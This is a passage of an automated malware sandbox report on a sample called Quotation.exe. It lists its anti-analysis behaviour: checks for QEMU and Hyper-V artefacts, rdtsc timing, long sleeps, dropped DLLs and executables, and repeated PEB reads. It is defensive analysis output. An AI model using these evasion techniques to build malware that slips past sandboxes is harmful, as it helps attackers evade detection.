        Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\explorer.exe TID: 6924 | Thread sleep time: -45000s >= -30000s
        Source: C:\Windows\SysWOW64\control.exe TID: 6272 | Thread sleep count: 103 > 30
        Source: C:\Windows\SysWOW64\control.exe TID: 6272 | Thread sleep time: -206000s >= -30000s
        Source: C:\Windows\explorer.exe | Last function: Thread delayed
        Source: C:\Windows\explorer.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\Quotation.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\libdatrie-1.dll
        Source: C:\Users\user\Desktop\Quotation.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\libpkcs11-helper-1.dll
        Source: C:\Users\user\Desktop\Quotation.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\percentile.dll
        Source: C:\Users\user\Desktop\Quotation.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\SolutionExplorerCLI.dll
        Source: C:\Users\user\Desktop\Quotation.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Cohesion\Quakily\System.Security.Cryptography.X509Certificates.dll
        Source: C:\Users\user\Desktop\Quotation.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Forureningsforebygget\Pegboard\maintenanceservice2.exe
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33571763 rdtsc
        Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 878
        Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 877
        Source: C:\Users\user\Desktop\Quotation.exe | API coverage: 1.3 %
        Source: C:\Windows\SysWOW64\control.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_00402765 FindFirstFileA,
        Source: C:\Users\user\Desktop\Quotation.exe | System information queried: ModuleInformation
        Source: C:\Users\user\Desktop\Quotation.exe | API call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\Quotation.exe | API call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
        Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
        Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
        Source: explorer.exe, 0000000C.00000003.23162953109.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CCCA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW:\z1
        Source: Quotation.exe, 0000000A.00000002.22757935753.00000000031C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22758431327.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22724867978.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22629701703.0000000003226000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22206133990.0000000003226000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23174182850.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CF8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23184882295.0000000010332000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26443929724.0000000010332000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
        Source: Quotation.exe, 00000001.00000002.21977604991.00000000068D9000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
        Source: Quotation.exe, 0000000A.00000002.22759106967.0000000004BA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_6D261A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33571763 rdtsc
        Source: C:\Users\user\Desktop\Quotation.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356A350 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33528347 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33528347 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33528347 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335AE372 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B0371 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B0371 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355237A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353B360 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356E363 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354E310 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356631F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33529303 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33529303 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335EF30A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33603336 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B330C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33568322 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33568322 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33568322 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355332D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352E328 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335633D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335643D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B43D5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352E3C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352C3C7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335363CB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355A390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33531380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3354F380 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335EF38A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335AC3B0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335393A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335393A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F124C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335EF247 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355F24A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352B273 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C327E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335ED270 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352821B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335BB214 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335BB214 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352A200 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33550230 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335B0227 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356A22B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335532C5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_336032C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335402F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335272E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352D2EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352D2EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33537290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33537290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33537290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335AE289 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352C2B0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335EF2AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335F92AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335542AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335542AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335292AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356415F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352A147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352A147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352A147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3358717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3358717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33605149 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33536179 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33603157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33603157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33603157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3356716D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_33560118 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
